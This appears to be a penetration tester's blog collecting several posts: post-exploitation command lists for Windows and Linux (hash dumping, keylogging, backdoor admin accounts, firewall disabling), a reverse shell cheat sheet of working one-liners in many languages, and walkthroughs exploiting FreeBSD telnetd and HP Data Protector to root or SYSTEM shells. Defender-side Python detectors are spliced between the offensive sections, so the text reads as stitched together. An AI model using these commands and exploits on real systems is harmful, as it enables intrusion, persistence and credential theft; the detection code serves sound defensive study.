Post Exploit Commands


Credit for most of the below goes to Mubix, who has created a few documents (on Google Docs) listing what to actually do once shell access has been gained. You can read more about it here and find the links to the docs; I'm simply blogging a summary of this for myself.

Meterpreter Post Auth

Information Gathering

getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

Escalating Privs

ps then migrate
getsystem

Tokens (use incognito)

list_tokens -u
impersonate_token
steal_token [pid]
rev2self

Retrieve Passwords

hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc

Session

enumdesktops
getdesktop
setdesktop
uictl disable keyboard

Keylog

keyscan_start
keyscan_dump
keyscan_stop

Nix Post Auth

Disable Firewall

/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules

Files to pull

/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/group OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers
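As an added, defender-side example (not from the page or from Mubix's documents): the files listed above are the first thing an intruder reads, so a host check that flags any of them being looser than expected is a cheap control. The expected modes below are this example's assumptions (Debian-style defaults, plus the AIX shadow location the page mentions); the audit only reports and changes nothing.

```python
import glob
import os
import stat

# Expected maximum permission bits for the files listed above. These are this
# example's assumptions (Debian-style defaults); adjust for your distribution
# (for instance /etc/shadow is 0000 or 0400 on some systems, which is stricter
# and therefore still passes).
EXPECTED_MODES = {
    "/etc/passwd": 0o644,            # meant to be world-readable, never group/world-writable
    "/etc/group": 0o644,
    "/etc/shadow": 0o640,            # root:shadow on Debian
    "/etc/gshadow": 0o640,
    "/etc/security/shadow": 0o640,   # AIX location
    "/etc/sudoers": 0o440,
    "/home/*/.ssh/id*": 0o600,       # private keys; .pub halves are skipped below
    "/root/.ssh/id*": 0o600,
}


def excess_bits(actual_mode: int, allowed_mode: int) -> int:
    """Permission bits set in actual_mode that allowed_mode does not permit (rwx only)."""
    return stat.S_IMODE(actual_mode) & ~allowed_mode & 0o777


def describe(bits: int) -> list:
    """Turn excess bits into readable findings."""
    names = []
    if bits & stat.S_IRGRP:
        names.append("group-readable")
    if bits & stat.S_IWGRP:
        names.append("group-writable")
    if bits & stat.S_IROTH:
        names.append("world-readable")
    if bits & stat.S_IWOTH:
        names.append("world-writable")
    if bits & (stat.S_IXGRP | stat.S_IXOTH):
        names.append("executable")
    return names


def audit(expected=EXPECTED_MODES) -> list:
    """Return [(path, actual mode, findings)] for each matched regular file looser than expected."""
    findings = []
    for pattern, allowed in expected.items():
        for path in sorted(glob.glob(pattern)):
            if path.endswith(".pub"):
                continue                      # public keys are fine to be readable
            try:
                st = os.lstat(path)           # lstat: do not follow a planted symlink
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            extra = excess_bits(st.st_mode, allowed)
            if extra:
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), describe(extra)))
    return findings


if __name__ == "__main__":
    for path, mode, why in audit():
        print(f"{path}: {mode} is too permissive ({', '.join(why)})")
```

Run it as root from cron or a configuration-management check; a non-empty result on /etc/shadow or a private key is worth an alert on its own.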

User Information

grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*

Windows Post Auth

Add user

net user pentest password /add
net localgroup administrators pentest /add

Add share

net share nothing$=C:\ /grant:pentest,FULL /unlimited

Disable Firewall

netsh firewall set opmode disable

Auto Start Directories

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\WINDOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

Accounts and Policies

net localgroup administrators OR net localgroup administrators /domain
net group "Domain Admins" /domain
net accounts ## or net accounts /domain

Files to pull

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive

Enable Remote Desktop

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Should you wish to have all this useful info (as well as an ASCII table) to hand, then feel free to use the following wallpaper (1920×1200).

Or customize the GIMP XCF file yourself.

Reverse Shell Cheat Sheet

There are many pages on the web documenting quick reverse shell one-liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them, but I wanted to recapture what they've got for my own notes (it's easier for me to find stuff if it's in one place). All credit goes to both of those guys, as that's where I got all this info from.

Step one – Set up your listener.

nc -l -v attackerip 4444

In all these examples the attacker IP will be 192.168.0.100 and the listener port 4444.

Bash

exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/192.168.0.100/4444 0>&1

Perl

perl -e 'use Socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

For Windows-based systems you can use:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e 'f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

The following does not need /bin/sh:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

The following is for Windows-based systems:

ruby -rsocket -e 'c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NetCat

nc -e /bin/sh 192.168.0.100 4444
nc -c /bin/sh 192.168.0.100 4444
/bin/sh | nc 192.168.0.100 4444

If the -e flag is disabled you can get around it using the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet
If netcat is missing (and in most cases you won't have it), then use telnet:

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0</tmp/p | /bin/bash 1>/tmp/p
telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445
# also start a listener on your machine on port 4445/tcp

Xterm
This one is a little trickier: you need to start a listener on the attacker box to catch the incoming xterm.

Xnest :1 &
xterm -display 127.0.0.1:1

and then inside the spawned xterm session run this:

xhost +victimip

Then on the victim you need to run this:

xterm -display 192.168.0.100:1
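All of the one-liners above leave recognisable traces in process command lines, shell history and auditd EXECVE records. The following detector is an added example, not part of the original post or of the pentestmonkey material it summarises; it classifies command lines against the families on this cheat sheet and runs over a constructed sample that includes look-alike benign commands, so you can see what it does and does not flag.

```python
import re

# Detection families, one per group of one-liners on the cheat sheet above.
# A command line can match more than one rule.
RULES = [
    # bash / Java: redirection into /dev/tcp or /dev/udp
    ("bash-devtcp", re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+")),
    # nc -e /bin/sh, nc -c /bin/sh, including bundled flags such as -ve
    ("nc-exec", re.compile(
        r"\b(?:nc|ncat|netcat)\b.*\s-[a-zA-Z]*[ce]\s+\S*(?:(?:ba)?sh|cmd(?:\.exe)?|powershell(?:\.exe)?)\b")),
    # mkfifo / mknod relay used when -e is unavailable, with nc or telnet
    ("fifo-relay", re.compile(r"\b(?:mkfifo|mknod)\b.*\b(?:nc|ncat|netcat|telnet)\b")),
    # "/bin/sh | nc host port" and the double-telnet variant
    ("shell-pipe", re.compile(r"/bin/(?:ba)?sh\b[^|]*\|\s*(?:nc|ncat|netcat|telnet)\b")),
    # interpreter one-liners: a socket plus fd duplication or a shell exec
    ("interp-socket-shell", re.compile(
        r"\b(?:perl|python\d?(?:\.\d+)?|php|ruby)\b.*"
        r"(?:socket|fsockopen|TCPSocket).*"
        r"(?:dup2|fdopen|exec|popen|/bin/(?:ba)?sh)", re.I | re.S)),
    # xterm pushed to a remote X display
    ("xterm-display", re.compile(r"\bxterm\b.*-display\s+[\w.\-]+:\d")),
]


def classify(cmdline: str) -> list:
    """Names of every rule that fires on one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines) -> list:
    """Return [(cmdline, [rule names])] for the command lines that look like reverse shells."""
    return [(line, classify(line)) for line in cmdlines if classify(line)]


# Constructed sample of what `ps -eo args` or an auditd EXECVE record might show.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/192.168.0.100/4444 0>&1",
    "nc -e /bin/sh 192.168.0.100 4444",
    "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f",
    'python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
    's.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
    'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',
    "xterm -display 192.168.0.100:1",
    "telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445",
    # benign lines that share keywords with the one-liners and must not fire
    "nc -zv 192.168.0.5 443",
    "python3 -c import socket; print(socket.gethostname())",
    "xterm -geometry 80x24",
    "/usr/bin/netcat -l -p 8080",
]

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(tags):22} {line[:70]}")
```

The rules are deliberately loose on hosts and ports (any IP or hostname, any port) because the listener address is the one thing an attacker will change; pair this with an alert on outbound connections from shells and interpreters to catch the variants the regexes miss.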

FreeBSD Derived telnetd service Exploit

Mentioned by hdm here and here, but I wanted to make a note of this myself.
The first thing to do is set up the scan to look for vulnerable telnetd services:

msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64
THREADS => 64

And now to run the scan

msf  auxiliary(telnet_encrypt_overflow) > run
[*] 192.168.0.1:23 Does not support encryption: Netgear Embedded Telnet Server (c) 2000-2007\x0a\x0aWARNING:  Access allowed by authorized users only.\x0a\x0alogin: \x0aERROR – Your telnet client rejected our request to use char-at-a-time mode!\x0aUnable to operate under this condition.\r\x0a\x0a\x0a\x0aYour telnet session has expired due to inactivity…
[+] 192.168.0.13:23 VULNERABLE: FreeBSD/i386 () (ttyp0)\x0d\x0a\x0d\x0alogin:
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 053 of 256 hosts (020% complete)
[*] Scanned 087 of 256 hosts (033% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 196 of 256 hosts (076% complete)
[*] Scanned 213 of 256 hosts (083% complete)
[*] Scanned 224 of 256 hosts (087% complete)
[*] Scanned 235 of 256 hosts (091% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(telnet_encrypt_overflow) >

Looks like 192.168.0.13 is vulnerable, what a surprise.
The exploit we need to use here is exploit/freebsd/telnet/telnet_encrypt_keyid:

msf  exploit(telnet_encrypt_keyid) > info

       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
     Module: exploit/freebsd/telnet/telnet_encrypt_keyid
    Version: 0
   Platform: BSD
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  Jaime Penalba Estebanez <jpenalbae@gmail.com>
  Brandon Perry <bperry.volatile@gmail.com>
  Dan Rosenberg
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
   --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST                      yes       The target address
  RPORT     23               yes       The target port
  USERNAME                   no        The username to authenticate as

Payload information:
  Space: 128
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in the encryption option
  handler of the FreeBSD telnet service.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-4862
  http://www.osvdb.org/78020
  http://www.securityfocus.com/bid/51182
  http://www.exploit-db.com/exploits/18280/

msf  exploit(telnet_encrypt_keyid) >

The payload is limited to 128 characters, so we only have a few options; a shell is more than enough though!

msf  exploit(telnet_encrypt_keyid) > show payloads

Compatible Payloads
===================

   Name                        Disclosure Date  Rank    Description
   ----                        ---------------  ----    -----------
   bsd/x86/exec                                 normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp                      normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp                   normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_tcp                       normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/reverse_tcp                    normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp                       normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_reverse_tcp                    normal  BSD Command Shell, Reverse TCP Inline
   generic/custom                               normal  Custom Payload
   generic/debug_trap                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                           normal  Generic x86 Tight Loop

We’ll select bsd/x86/shell/bind_tcp to make things quick.

msf  exploit(telnet_encrypt_keyid) > set payload bsd/x86/shell/bind_tcp
payload => bsd/x86/shell/bind_tcp
msf  exploit(telnet_encrypt_keyid) > set rhost 192.168.0.13
rhost => 192.168.0.13

And now to exploit; note that it tries against all versions of FreeBSD from 5.5 to 8.2:

msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Brute forcing with 9 possible targets
[*] Trying target FreeBSD 8.2…
[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 8.1…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 8.0…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 7.3/7.4…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 7.0/7.1/7.2…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 6.3/6.4…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 6.0/6.1/6.2…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 5.5…
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Sending first payload
[*] Command shell session 1 opened (192.168.0.8:41452 -> 192.168.0.13:4444) at 2012-01-18 11:01:05 -0500
[*] Sending second payload…

Looks like we got a shell:

msf  exploit(telnet_encrypt_keyid) > sessions -i 1
[*] Starting interaction with 1…

whoami
root

To be more stealthy you could set the exploit code to the specific version of FreeBSD you’re targeting:

Available targets:
  Id  Name
   --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3
msf  exploit(telnet_encrypt_keyid) > set target 7
target => 7
msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload…
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Command shell session 2 opened (192.168.0.8:48865 -> 192.168.0.13:4444) at 2012-01-18 11:03:55 -0500
sessions -l

Active sessions
===============

  Id  Type       Information  Connection
  --  ----       -----------  ----------
  2   shell bsd               192.168.0.8:48865 -> 192.168.0.13:4444
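The module's description says the bug is in the ENCRYPT option handler, and its name points at the key ID. As an added example (not part of the post or of Metasploit), here is a defender-side parser for telnet subnegotiations that flags ENCRYPT key-ID suboptions whose ID is implausibly long, the kind of check an IDS signature or a telnet proxy would make on port 23 traffic. The protocol constants come from RFC 854 and RFC 2946; the 64-byte threshold is this example's assumption about the size of the affected buffer, and the sample negotiations are constructed, not captured.

```python
# Telnet protocol constants (RFC 854 commands, RFC 2946 ENCRYPT option).
IAC, SE, SB = 255, 240, 250
WILL, WONT, DO, DONT = 251, 252, 253, 254
OPT_ENCRYPT = 38
ENC_KEYID = 7
ENC_SUBCMD = {0: "IS", 1: "SUPPORT", 2: "REPLY", 3: "START", 4: "END",
              5: "REQUEST-START", 6: "REQUEST-END", 7: "ENC_KEYID", 8: "DEC_KEYID"}
# Key IDs longer than this are reported. 64 is this example's assumption about the
# fixed key-id buffer in the affected libtelnet code; real clients send a byte or two,
# so a lower threshold is also reasonable.
KEYID_LIMIT = 64


def iter_suboptions(stream: bytes):
    """Yield (option, payload) for each IAC SB <opt> ... IAC SE, with IAC IAC unescaped."""
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC:
            i += 1                       # ordinary data byte
            continue
        if i + 1 >= n:
            break
        cmd = stream[i + 1]
        if cmd in (WILL, WONT, DO, DONT):
            i += 3                       # three-byte option negotiation
            continue
        if cmd != SB:
            i += 2                       # IAC IAC (escaped 0xff) or a two-byte command
            continue
        if i + 2 >= n:
            break
        opt = stream[i + 2]
        payload = bytearray()
        j = i + 3
        while j < n:
            b = stream[j]
            if b != IAC:
                payload.append(b)
                j += 1
            elif j + 1 < n and stream[j + 1] == IAC:
                payload.append(IAC)      # escaped 0xff inside the subnegotiation
                j += 2
            else:
                # IAC SE closes the suboption; any other IAC here is malformed, so stop.
                j += 2 if j + 1 < n and stream[j + 1] == SE else 1
                break
        yield opt, bytes(payload)
        i = j


def find_oversized_keyids(stream: bytes, limit: int = KEYID_LIMIT) -> list:
    """Return [(subcommand name, key-id length)] for ENCRYPT key-id suboptions longer than limit."""
    hits = []
    for opt, payload in iter_suboptions(stream):
        if opt != OPT_ENCRYPT or not payload:
            continue
        subcmd, keyid_len = payload[0], len(payload) - 1
        if subcmd == ENC_KEYID and keyid_len > limit:
            hits.append((ENC_SUBCMD[subcmd], keyid_len))
    return hits


# Constructed sample negotiations (not captured from a real host).
BENIGN = (bytes([IAC, WILL, OPT_ENCRYPT])
          + bytes([IAC, SB, OPT_ENCRYPT, 1, 1, IAC, SE])           # SUPPORT DES_CFB64
          + bytes([IAC, SB, OPT_ENCRYPT, ENC_KEYID, 0, IAC, SE]))  # one-byte key id
SUSPICIOUS = (BENIGN
              + bytes([IAC, SB, OPT_ENCRYPT, ENC_KEYID]) + b"A" * 200 + bytes([IAC, SE]))

if __name__ == "__main__":
    print("benign:", find_oversized_keyids(BENIGN))
    print("suspicious:", find_oversized_keyids(SUSPICIOUS))
```

Feed it the client-to-server byte stream of a port 23 session (for example from a pcap) and alert on any hit; the same parser can be extended to other options by keying on the option byte it yields.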

HP Data Protector <6.20 vulnerability

OK, so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service (all of the output below is from my own testbed, hence the local 192.168.x.x IPs):

root@bt:~# nc 192.168.0.18 5555
break
HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08
root@bt:~#

This version is flagged as vulnerable as per this HP Security Bulletin. A little digging with exploit-db found the following exploits:

root@bt:~# /pentest/exploits/exploitdb/searchsploit protector
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit             /windows/dos/9006.py
HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos (meta)              /windows/dos/9007.rb
HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS /windows/dos/14974.txt
HP Data Protector Media Operations NULL Pointer Dereference Remote DoS      /win32/dos/15214.py
HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS /windows/dos/15307.py
HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service /windows/dos/15649.pl
HP Data Protector Manager v6.11 Remote DoS in RDS Service                   /windows/dos/15940.pl
HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)    /windows/remote/17339.py
HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)  /windows/remote/17345.py
HP Data Protector 6.20 Multiple Vulnerabilities                             /windows/dos/17458.txt
HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability               /windows/dos/17461.txt
HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass                  /windows/remote/17468.py
HP Data Protector Remote Shell for HP-UX                                    /hp-ux/remote/17614.sh
HP Data Protector Remote Root Shell for Linux                               /linux/remote/17648.sh
HP Data Protector Media Operations <= 6.20 Directory Traversal              /windows/webapps/18077.txt
root@bt:~#

Of interest are these two:

HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055) /windows/remote/17339.py
HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) /windows/remote/17345.py

As I don't have time to edit the shellcode in the second example, we'll just play with the first for now.
The first just runs a command and relays the output to the terminal; the second attempts to download and run the command.
Using the exploit is as simple as pointing it at the target and executing it:

root@bt:~# python 17339.py 192.168.0.18 5555
Sending payload
[70:18]
[70:18] Windows IP Configuration
[70:18]
[70:18]
[70:18] Ethernet adapter INTERNAL_LAN:
[70:18]    Connection-specific DNS Suffix  . :
[70:18]    IP Address. . . . . . . . . . . . : 192.168.100.1
[70:18]    Default Gateway . . . . . . . . . : 192.168.100.1
[70:18] Ethernet adapter Bridged:
[70:18]    Connection-specific DNS Suffix  . :
[70:18]    IP Address. . . . . . . . . . . . : 192.168.0.18
[70:18]    Subnet Mask . . . . . . . . . . . : 255.255.255.0
[70:18]    Default Gateway . . . . . . . . . : 192.168.0.1
root@bt:~#

A quick look at the payload bytes shows that it attempts to run the command as SYSTEM:

\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00

Translates into:

¤ 2 fdiskyou 0 SYSTEM fdiskyou C 20 fdiskyou Poc NTAUTHORITY NTAUTHORITY NTAUTHORITY 0 0 ../../../../../../../../../../\windows\system32\ipconfig.exe
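The request bytes above decode into a sequence of NUL-terminated, space-prefixed fields. As an added example (not from the post or from the exploit-db script), the following parser splits the page's request into those fields and reports what a defender watching port 5555 would want to alert on: the traversal in the command field and the SYSTEM account name. The framing assumption (a 4-byte big-endian length prefix) is checked against the sample itself, where 0xa4 = 164 matches the 164 bytes that follow; it is this example's reading of the format, not a vendor specification.

```python
import struct

# The request bytes quoted above, exactly as on the page, split for readability.
PAGE_REQUEST = (
    b"\x00\x00\x00\xa4"                                      # length prefix: 0xa4 = 164
    b"\x20\x32\x00"                                          # " 2"
    b"\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00"              # " fdiskyou"
    b"\x20\x30\x00"                                          # " 0"
    b"\x20\x53\x59\x53\x54\x45\x4d\x00"                      # " SYSTEM"
    b"\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00"              # " fdiskyou"
    b"\x20\x43\x00"                                          # " C"
    b"\x20\x32\x30\x00"                                      # " 20"
    b"\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00"              # " fdiskyou"
    b"\x20\x50\x6f\x63\x00"                                  # " Poc"
    b"\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00"  # " NTAUTHORITY" (x3)
    b"\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00"
    b"\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00"
    b"\x20\x30\x00"                                          # " 0"
    b"\x20\x30\x00"                                          # " 0"
    b"\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"   # " ../" x5
    b"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"       # "../" x5
    b"\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32"   # "\windows\system32"
    b"\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00"          # "\ipconfig.exe"
)


def parse_request(raw: bytes):
    """Split a request into (declared_length, fields).

    Assumed framing: a 4-byte big-endian length, then that many bytes of
    NUL-terminated fields, each prefixed with a space. This matches the sample
    above but is this example's assumption, not a documented format.
    """
    if len(raw) < 4:
        raise ValueError("too short for a length prefix")
    declared = struct.unpack(">I", raw[:4])[0]
    body = raw[4:]
    if declared != len(body):
        raise ValueError(f"length prefix {declared} != body length {len(body)}")
    fields = [piece.lstrip(b" ").decode("latin-1") for piece in body.split(b"\x00")]
    while fields and fields[-1] == "":
        fields.pop()                     # trailing NULs leave empty pieces behind
    return declared, fields


def flag(raw: bytes) -> list:
    """Reasons a defender would alert on this request; empty means nothing stood out."""
    _, fields = parse_request(raw)
    command = fields[-1] if fields else ""
    reasons = []
    if "../" in command or "..\\" in command:
        reasons.append("path traversal in command field")
    if "SYSTEM" in fields:
        reasons.append("request names the SYSTEM account")
    if command.lower().endswith(".exe"):
        exe = command.replace("\\", "/").rsplit("/", 1)[-1]
        reasons.append(f"executes {exe}")
    return reasons


if __name__ == "__main__":
    length, parsed = parse_request(PAGE_REQUEST)
    print(f"declared length {length}, {len(parsed)} fields")
    for index, field in enumerate(parsed):
        print(f"  [{index:2}] {field}")
    print("alerts:", flag(PAGE_REQUEST))
```

The length check is what makes this usable on a live stream: a reassembled TCP segment whose prefix does not match its body is either fragmented or not this protocol, and the parser refuses it rather than guessing.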

One thing to note is that this will not work on a Win2K box unless you replace /windows/ with /WINNT/. I quickly edited the shellcode to run whoami.exe instead, to confirm which user account we have exploited:

root@bt:~# python 17339.py 192.168.0.18 5555
Sending payload
[70:18] nt authority\system
root@bt:~#

Sweet, so it works.
As an afterword: although there is an exploit in Metasploit that supposedly works, it isn't designed for Windows targets; to get it to work you have to bodge it, and it still only sends 4 characters, which is pointless:

msf  exploit(openview_omniback_exec) > info

       Name: HP OpenView OmniBack II Command Execution
     Module: exploit/multi/misc/openview_omniback_exec
SNIP
Description:
  This module uses a vulnerability in the OpenView Omniback II service
  to execute arbitrary commands. This vulnerability was discovered by
  DiGiT and his code was used as the basis for this module. For
  Microsoft Windows targets, due to module limitations, use the
  "unix/cmd/generic" payload and set CMD to your command. You can only
  pass a small amount of characters (4) to the command line on
  Windows.

Connecting to HTTPS services from the terminal

A little brain issue prevented me from remembering how to connect to an HTTPS service on the command line. NetCat doesn't seem to work; it just hangs.
Fortunately, after wasting some time, I recalled how to do it in not one but two ways:
Option 1: ncat (part of the Nmap toolkit)

root@bt:~# ncat --ssl www.phillips321.co.uk 443
OPTIONS / HTTP/1.1
Host:www.phillips321.co.uk

HTTP/1.1 200 OK
Date: Tue, 17 Jan 2012 15:24:24 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0d PHP/5.3.6
X-Powered-By: PHP/5.3.6
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Option 2: openssl (part of the OpenSSL tools)

openssl s_client -connect www.phillips321.co.uk:443

